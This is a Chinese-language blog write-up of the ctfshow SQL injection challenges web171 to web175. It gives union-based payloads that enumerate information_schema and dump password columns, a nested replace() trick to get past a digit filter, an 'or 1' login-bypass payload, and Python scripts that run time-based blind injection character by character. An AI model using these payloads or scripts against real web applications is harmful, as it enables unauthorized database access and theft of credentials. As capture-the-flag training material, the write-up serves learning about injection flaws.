目录
1、web171
单引号测一下,报错
--+ 闭合后回显正常
也可以用 # ,不过需要 URL 编码
成功闭合之后,先判断下字段数:
1' order by 3--+
3 的时候正常
4 的时候报错,说明只有 3 列
测了一下,三个回显位都能正常回显:
0' union select 1,2,3--+
先查一下基本信息:
0' union select database(),user(),version()--+
当前数据库名为 ctfshow_web
这里说明一下,因为 mysql 5.0 及其以上的都会自带一个叫 information_schema 的数据库,相当于是一个已知的数据库,并且该数据库下储存了所有数据库的所以信息。
查该数据库下的所有表:
0' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='ctfshow_web'--+
其中 2 和 3 只是占位符
可以看到存在一个名为 ctfshow_user 的表,我们继续查该表下的列名:
0' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user'--+
没看到 flag 这种关键字,因此我们 id,username,password 都查一下:
0' union select id,username,password from ctfshow_web.ctfshow_user--+
最终在 id 为 26 的 password 里找到 flag:ctfshow{64dd0daa-4600-4813-8ef2-cffa99a6f05f}
当然这种没有绕过的给到 sqlmap 就直接一把嗦了,这里简便的方法也可以采用万能密码:
1'or 1 --+
2、web172
在无过滤注入 1 里面用万能密码未找到 flag
试一下注入 2 的,经过测试这里的回显位只有两个
数据库都懒得查了,用 database() 代替,直接查表:
0' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()--+
新增了一个 ctfshow_user2 的表,查一下该表下面内容,注意这里有一个检查,要求 username 的内容不能是 flag,才能正常查询成功,那么我们就不查 username ,查 id 和 password 就行了:
0' union select id,password from ctfshow_user2--+
当然也可以只查 password:
0' union select 1,password from ctfshow_user2--+
拿到 flag:ctfshow{97bd5892-2617-417a-8c2e-16134f741704}
如果查询内容有 username,因为 username 里包含了 'flag',因此无法正常回显 flag 的内容:
3、web173
判断一下这次又是三个字段数了,根据前面的规律,这次的表名应该是:ctfshow_web.ctfshow_user3,因为还是对输出过滤了 flag,所有我们还是不查用户名,用占位符占位即可。
payload:
只查 password
0' union select 1,2,password from ctfshow_web.ctfshow_user3--+
查 id 与 password
0' union select id,2,password from ctfshow_web.ctfshow_user3--+
拿到 flag:ctfshow{eff707be-5727-412e-93be-2c75e5783fa5}
4、web174
还没查就报错了
这里有点问题,手动改一下请求文件为:select-no-waf-4.php
可以发现这里查询结果的输出不能出现数字
查询语句的内容也不能出现数字
可以查到数据库名:ctfshow_web ,因为数据库名里没有数字
但是查表名就不行了,根据前面规律,表名应该为 ctfshow_user4,包含了数字,所以结果出不来,不能直接查。
0' union select group_concat(table_name),'a' from information_schema.tables where table_schema=database()--+
对输出结果进行替换后再输出,将数字都替换成字母,payload:
0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(group_concat(table_name),'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'a' from information_schema.tables where table_schema=database()--+
查询结果为:ctfshow_userD
D 对应的是 4 ,因此表名为:ctfshow_user4
查询 password:
0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'a' from ctfshow_user4--+
得到:ctfshow{eIdGcBcc-cACA-DEIF-aGcB-aAJGdJddGBCe}
最后将查询结果的数字替换回去,也可以用 replace 函数,反过来即可。
这里用 python 实现:
def rev_replace(txt):
repl = {
'A': '1',
'B': '2',
'C': '3',
'D': '4',
'E': '5',
'F': '6',
'G': '7',
'H': '8',
'I': '9',
'J': '0'
}
for k, v in repl.items():
txt = txt.replace(k, v)
return txt
txt = input("输入:")
out = rev_replace(txt)
print("替换后: ", out)
拿到 flag:ctfshow{e9d7c2cc-c131-4596-a7c2-a107d0dd723e}
5、web175
正常的查 1 都没有回显
if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
$ret['msg']='查询成功';
}
正则匹配过滤掉的是所有 ASCII 字符(从 \x00 到 \x7f,也就是从 0 到 127 的所有字符,包括控制字符、数字、字母和符号)。
因此这里采用时间盲注,先测试一下:
1' and sleep(5)--+
观察页面确实存在延时
我个人比较菜,然后一直都是脚本小子,这次自己来写一下,希望能更好的理解下时间盲注。
首先看了下它这里除了查询的 id,还有另外的两个参数,这个我们在写脚本时也需要加进去,并且注意到,它调用的接口其实是 /api 下的 v5.php,而不是 select-no-waf-5.php 这个文件哦。
接下来我们先判断下它数据库名的长度,这个其实可以通过 burpsuite 的攻击模块爆破的,没关系,我们这里手写一遍,也锻炼下我们 python 的能力。
关于 burpsuite 用来爆破这种时间盲注,以及一些原理可以参考我之前的博客:
1' and if(length(database())=11,sleep(3),0) --+
import requests
url = 'http://e03daa7b-66ad-48fb-8349-da520b7f5fe8.challenge.ctf.show/api/v5.php'
i = 0
for i in range(1, 15):
payload = f"id=1' and if(length(database())={i},sleep(3),0) --+&page=1&limit=10"
# print(payload)
re = requests.get(url, params=payload)
time = re.elapsed.total_seconds()
print(f"{i}:{time}")
# print(re.url)
可以看到当数据库名长度为 11 时,响应存在延时,这与我们前面得到的数据库名为:ctfshow_web,长度就是 11符合。
下面使用两个 for 循环遍历数据库名,从第一个字符猜到第 11 个字符,字符的可能性这里字典设置的是小写字母加数字加下划线:
import requests
import string
url = 'http://2e5bbcf3-38df-43a5-b8a5-710f30ae9957.challenge.ctf.show/api/v5.php'
dic = string.ascii_lowercase + string.digits + '_'
out = ''
for j in range(1, 12):
for k in dic:
payload = f"id=1' and if(substr(database(),{j},1)='{k}',sleep(3),0) --+&page=1&limit=10"
# print(payload)
re = requests.get(url, params=payload)
time = re.elapsed.total_seconds()
# print(f"{j}:{time}")
if time > 2:
print(k)
out += k #响应延时则将猜测的字符添加到结果里
break #跳出内层的for循环,继续遍历下一位
print(out)
跑完得到数据库名为:ctfshow_web
接下来我们继续猜表名,这里就不先判断表名的长度了,设置范围大一点,以确保完整输出数据,使用标志位来判断是否到了最后一位:
import requests
import string
url = 'http://2e5bbcf3-38df-43a5-b8a5-710f30ae9957.challenge.ctf.show/api/v5.php'
dic = string.ascii_lowercase + string.digits + '_'
out = ''
for j in range(1, 30):
a = 1 #设置一个标志位,用来判断是否已经猜到了最后一位
for k in dic:
# payload = f"id=1' and if(substr(database(),{j},1)='{k}',sleep(3),0) --+&page=1&limit=10"
payload = f"id=1' and if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"
# print(payload)
re = requests.get(url, params=payload)
time = re.elapsed.total_seconds()
# print(f"{j}:{time}")
if time > 2:
print(k)
a = 0 #如果找到字符,则将标志位置0
out += k
break #跳出内层的for循环,继续遍历下一位
if a == 1: #在进行下一次循环前,先判断当前字符是否找到
break #若没有找到,则跳出外层循环,表示我们已经到了最后一个字符
print(out)
得到表名为:ctfshow_user5
我们可以通过调整 limit 的参数来获取到其他的表名,有时候也可以使用 group_concat 函数。
payload = f"id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"
在 SQL 中,LIMIT 子句用于指定查询结果中返回的行数,用法:
LIMIT offset, count
offset 是要跳过的行数,offset 从 0 开始计数,count 是要返回的行数。
比如:
LIMIT 0, 1
从查询结果的第 0 行(即第一行)开始,返回 1 行结果,即返回了查询结果的第一行。
LIMIT 1, 1
从查询结果的第 1 行(即第二行)开始,返回 1 行结果,即返回了查询结果的第二行。
这里尝试找第二行,发现一会代码就结束了,说明这里只有一个表:
接下来查列名:
payload = f"id=1' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user5'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"
这里只出了一个 id,因为换行导致我们误判为到了最后一个字符,因为我们的字典里只包括数字、小写字母和下划线,因此字符没找到,便跳出外层循环结束了代码。
注释掉最后两句判断结束的语句即可输出完整结果:
也可以通过 limit 来指定查询第三行的内容:
payload = f"id=1' and if(substr((select column_name from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user5' limit 2, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"
因为我编程能力确实很差,所以这个代码还是存在很多问题的,需要继续改进和完善。
由于前面的题目,我们知道 flag 在 password 字段里,那么我们就查它:
由于 flag 不在第一行,因此我们再细化查询的条件,即 username='flag'
payload = f"id=1' and if(substr((select password from ctfshow_web.ctfshow_user5 where username='flag'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"
因为 flag 内容还包括了大括号和减号,为了避免提早结束,我们拓展下字典:
dic = string.ascii_lowercase + string.digits + '_-{}'
结果的长度也得扩展:
for j in range(1, 100):
最终的脚本:
import requests
import string
url = 'http://2e5bbcf3-38df-43a5-b8a5-710f30ae9957.challenge.ctf.show/api/v5.php'
dic = string.ascii_lowercase + string.digits + '_-{}'
out = ''
for j in range(1, 100):
a = 1 #设置一个标志位,用来判断是否已经猜到了最后一位
for k in dic:
# payload = f"id=1' and if(substr(database(),{j},1)='{k}',sleep(3),0) --+&page=1&limit=10" # 猜数据库名
# payload = f"id=1' and if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10" #猜表名
# payload = f"id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10" #猜表名
# payload = f"id=1' and if(substr((select column_name from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user5' limit 2, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10" # 猜列名
payload = f"id=1' and if(substr((select password from ctfshow_web.ctfshow_user5 where username='flag'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10" # 猜具体字段
# print(payload)
re = requests.get(url, params=payload)
time = re.elapsed.total_seconds()
# print(f"{j}:{time}")
if time > 2:
print(k)
a = 0 #如果找到字符,则将标志位置0
out += k
break #跳出内层的for循环,继续遍历下一位
if a == 1: #在进行下一次循环前,先判断当前字符是否找到
break #若没有找到,则跳出外层循环,表示我们已经到了最后一个字符
print(out)
拿到 flag:ctfshow{d6c5132a-3611-4cd3-a840-37e6a68ac6dd}
同理,当我们注释掉最后两行判断结束的代码,并使用 group_concat,就算不追加 username='flag' 的条件,也是可以查到 flag 的,不过这个时间就比较久了,因为我们查的是所有的数据:
payload = f"id=1' and if(substr((select group_concat(password) from ctfshow_web.ctfshow_user5), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"
大致就这样吧,不敢相信我竟然自己写了个盲注的脚本,还加了那么多注释和个人理解,我知道我的代码写得不好,因为还在慢慢学习嘛,对于时间盲注其实更高效的查询方法是二分法查询,这次我主要是练习下自己动手写代码的能力,如果你也是不会写代码,认真看完相信你也能收获些东西的,后面如果有时间,再给大家详细出一个二分法查找的代码。
看完感觉有收获的可以给我个赞或者关注吗哈哈哈,感谢支持!我们下篇博客再见。
标签:web,web175,web171,id,ctfshow,table,payload,select,schema From: https://blog.csdn.net/Myon5/article/details/140819830